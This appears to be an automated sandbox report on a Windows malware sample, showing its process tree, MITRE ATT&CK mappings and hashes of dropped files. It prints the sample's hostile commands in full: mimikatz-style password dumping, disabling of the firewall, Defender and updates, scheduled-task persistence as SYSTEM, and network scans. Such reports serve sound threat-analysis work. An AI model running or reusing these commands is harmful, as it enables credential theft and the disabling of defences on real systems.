C:\Windows\kertltug\yrhtynb.exeC:\Windows\kertltug\yrhtynb.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2652
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2252
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1192
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:700
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:1776
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2072
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2688
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rbiunekit\rnittcezi\wpcap.exe /S2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\rbiunekit\rnittcezi\wpcap.exeC:\Windows\rbiunekit\rnittcezi\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
PID:336 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1268
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
PID:2236 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:532
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
PID:2256 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2340
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:812
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2460 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2052 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:836
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2672 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1700 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rbiunekit\rnittcezi\ieevbhheu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\rbiunekit\rnittcezi\Scant.txt2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:764 -
C:\Windows\rbiunekit\rnittcezi\ieevbhheu.exeC:\Windows\rbiunekit\rnittcezi\ieevbhheu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\rbiunekit\rnittcezi\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rbiunekit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\rbiunekit\Corporate\log.txt2⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2116 -
C:\Windows\rbiunekit\Corporate\vfshost.exeC:\Windows\rbiunekit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lbrtyerzc" /ru system /tr "cmd /c C:\Windows\ime\yrhtynb.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lbrtyerzc" /ru system /tr "cmd /c C:\Windows\ime\yrhtynb.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rttrkztle" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kertltug\yrhtynb.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1744 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rttrkztle" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kertltug\yrhtynb.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "erqyvqztc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\uqvnjvbfz\uevevu.exe /p everyone:F"2⤵PID:2500
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "erqyvqztc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\uqvnjvbfz\uevevu.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2440
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:1284
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2704
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:480
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1620
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2068
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2980
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2928
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2996
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2656
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1940
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2468
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3024
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:2816 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:1812 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:3012
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:1860
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:1856 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
PID:2508
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
PID:3036 -
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
PID:1708 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
PID:2376
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
PID:1484 -
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
PID:1300 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
PID:828
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:1588
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:1056
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:764 -
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:1760
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:1680 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1720
-
-
-
C:\Windows\TEMP\rbiunekit\zeeblsutf.exeC:\Windows\TEMP\rbiunekit\zeeblsutf.exe -accepteula -mp 1012 C:\Windows\TEMP\rbiunekit\1012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2732
-
-
C:\Windows\TEMP\rbiunekit\zeeblsutf.exeC:\Windows\TEMP\rbiunekit\zeeblsutf.exe -accepteula -mp 1108 C:\Windows\TEMP\rbiunekit\1108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\TEMP\rbiunekit\zeeblsutf.exeC:\Windows\TEMP\rbiunekit\zeeblsutf.exe -accepteula -mp 1160 C:\Windows\TEMP\rbiunekit\1160.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\TEMP\rbiunekit\zeeblsutf.exeC:\Windows\TEMP\rbiunekit\zeeblsutf.exe -accepteula -mp 1640 C:\Windows\TEMP\rbiunekit\1640.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\TEMP\rbiunekit\zeeblsutf.exeC:\Windows\TEMP\rbiunekit\zeeblsutf.exe -accepteula -mp 1716 C:\Windows\TEMP\rbiunekit\1716.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\TEMP\rbiunekit\zeeblsutf.exeC:\Windows\TEMP\rbiunekit\zeeblsutf.exe -accepteula -mp 1260 C:\Windows\TEMP\rbiunekit\1260.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\TEMP\rbiunekit\zeeblsutf.exeC:\Windows\TEMP\rbiunekit\zeeblsutf.exe -accepteula -mp 1792 C:\Windows\TEMP\rbiunekit\1792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\TEMP\rbiunekit\zeeblsutf.exeC:\Windows\TEMP\rbiunekit\zeeblsutf.exe -accepteula -mp 888 C:\Windows\TEMP\rbiunekit\888.dmp2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\rbiunekit\rnittcezi\scan.bat2⤵
- Loads dropped DLL
PID:2288 -
C:\Windows\rbiunekit\rnittcezi\tqtesifgl.exetqtesifgl.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1520
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
C:\Windows\system32\taskeng.exetaskeng.exe {F8D92384-5F88-44F0-A5F1-62A9A88B01FF} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2320
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\uqvnjvbfz\uevevu.exe /p everyone:F2⤵PID:1596
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2204
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\uqvnjvbfz\uevevu.exe /p everyone:F3⤵PID:2444
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kertltug\yrhtynb.exe /p everyone:F2⤵PID:3056
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2216
-
-
C:\Windows\system32\cacls.execacls C:\Windows\kertltug\yrhtynb.exe /p everyone:F3⤵PID:2108
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\yrhtynb.exe2⤵PID:336
-
C:\Windows\ime\yrhtynb.exeC:\Windows\ime\yrhtynb.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1472
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\uqvnjvbfz\uevevu.exe /p everyone:F2⤵PID:1356
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1920
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\uqvnjvbfz\uevevu.exe /p everyone:F3⤵PID:1748
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kertltug\yrhtynb.exe /p everyone:F2⤵PID:2672
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1372
-
-
C:\Windows\system32\cacls.execacls C:\Windows\kertltug\yrhtynb.exe /p everyone:F3⤵PID:904
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\yrhtynb.exe2⤵PID:1820
-
C:\Windows\ime\yrhtynb.exeC:\Windows\ime\yrhtynb.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1588
-
-
-
C:\Windows\SysWOW64\zmxrwm.exeC:\Windows\SysWOW64\zmxrwm.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2940
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.7MB
MD51089a10ba9fd42e5e1d87251a752de0a
SHA1f004852cdbb71c72d01ca3d78533796b656a707f
SHA256c27e7b9bca6b44d6fdf5cb302eba611b49dd4de36817a5a9955fbb951a613350
SHA512dd2006374ecbbad18333d1ccb4075e84ac17d1631b096eac38ead36fadca95eee25b4d69678810f8e0b523d5794eb49cea3fc4f685636a1a627bb18e25db8b71
-
Filesize
1.4MB
MD5731d5de7c061000ad525134421bd2124
SHA12e20ebe4c7d0c74666e5a34ed2edb0988b1ec4fb
SHA2561fd604b60b3c277a451c9f23d64fa7cbbc6a1a0807d712af76d5d1bc13108671
SHA5122e64f4d121722e9ebd721f6d6ac977e4d4df67e1a4c93d736bb7092d6b7de0f08238076589c4040bcae86dd1883aeeba86ce9fa17e333cc92513f74886b09971
-
Filesize
1.3MB
MD5a17a9fd51e184c361ac33c2387fd0727
SHA1c732a6d5ae1ff4011f252c450d80a4531a91da5e
SHA256dbd52211bd634845fe2deeb680681f87d5517ca0d3ab694c195393bd627d3e8a
SHA512b4b2335b85bc34b3109f3f9199b07218a7c5431c44eed8af585c852ae25e64592a0d39967227eedf3b459b3d6a99682079e3b57d39511753b746131e91778be9
-
Filesize
5.3MB
MD5187c84c3cca34609cfb93cb9aaf8ab42
SHA1573b3339e027e321edde888f75662b8f5575647d
SHA2564ad5b2e10b481a1c2825e2399ae7279ab5f472b409b7aebdad9efdf8c85ad941
SHA51241dcdeaf29547fe9e8e4a28999eba43c6d5acb83eae7a815dd8f9cdc14a41adcb696a603c85e379f50332d2d0752f284207c5bf33476ee3148125135ee3a369f
-
Filesize
4.0MB
MD5b5994273426096b1ddf2200722fd7149
SHA1701aa7bf8f044f12922fcbc49c753185a70ef1c5
SHA256da4eb76ff9eb3996c2f8cf1de309878acd50edb8859d94404ed00e9e6bc09217
SHA512497b75fd9d1080bdf5e578d8a0957f9a7e317706f2b6cb2f60720de81945d41db6ac819f7532c8f6553c78f5d4bb7d088dd9a6f91fc88c9ecb322e73aa8d4859
-
Filesize
2.1MB
MD526b2123591a8ce6d129a154578ad9a90
SHA1e9b623025ae503f39ac7f4fa5e5e78e0b6352540
SHA256ad4155ef5c99ffa6722255ba7310420748fc89988eb51170c79023a2df8346a1
SHA51282ecb96abfc22e66cc72cbed267495454c5c26bedf44ca592eb9d1f59c4194a1bf4d9b67d52b1a5d5ea09ae11da886d66e5f23a320241d338bb2d384e6f026a6
-
Filesize
7.2MB
MD57799a8aa2d7963eaa2db16237becc65b
SHA1e29e62947dfea5189ef66dd60fe8cc869c5ec934
SHA2563973a861c24159fe15134cb20d73531a171ba625e88c5eb4e1294291268835b5
SHA5125318547baf6c9a0adbec07316c2d74bd6decdb016f483a9d445b70d69c79bbea1f75592e04fc0114212925fa83b79e9869366b49179f77ecc9f728dc5fa5b77b
-
Filesize
851KB
MD53a36356abb34d82542dfa49221deb9c4
SHA1b6ab48e776576ff0f4e5771d3435a9be863a2bb0
SHA25691fa6c331bd8b3c0ad800662be0e33db91bb7520ad29733d90f570f3f523e9e2
SHA5125289e0676ea8a170da24fd56316129db51f3d5c6ffe2694611d203cec7c15775338cd85c35e617c78b51cf45690281ff9f760d554d84485b6cb053cc00cec4b1
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
160B
MD5ac8fd2b9a9ce8b2fc050a416f9c5b4c7
SHA12bf727c78ff890ee619afaec3504e083f658e860
SHA2564384b4038ef777970d2f2409646e175b036cda38fd1d5e91185708047fc2dbfc
SHA512a685a77bc41acd3c968edeb68652e0a0fd8470d59b7bc5a9184508fe3678b31ece5ec4cb2b8d1abaa131bea520bf5f5213cbdcdca4d634c6b3fef3868993694b
-
Filesize
975B
MD5b5d815ff5310f62de5020591be598bc0
SHA18013562b0cc2516d16d474308c8982a31b7f5dd0
SHA256a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85
SHA5124e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
11.2MB
MD5cb76a9edbb092088034aed8c6568dcec
SHA1780a996c39a21d3597a5b25693c11ee175ed1a24
SHA256d8a28af6a409cb04088a2941d32da2d966c734808d5866c1d791a75817fcea9e
SHA51261e8b5fbd9b18f8642f4c2219cd208490e71824012c69b5998b1e92d677a139e0645843ba79585ce1edcb63e6724433f047a342b14e9a80d7ef572587b1948c5
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe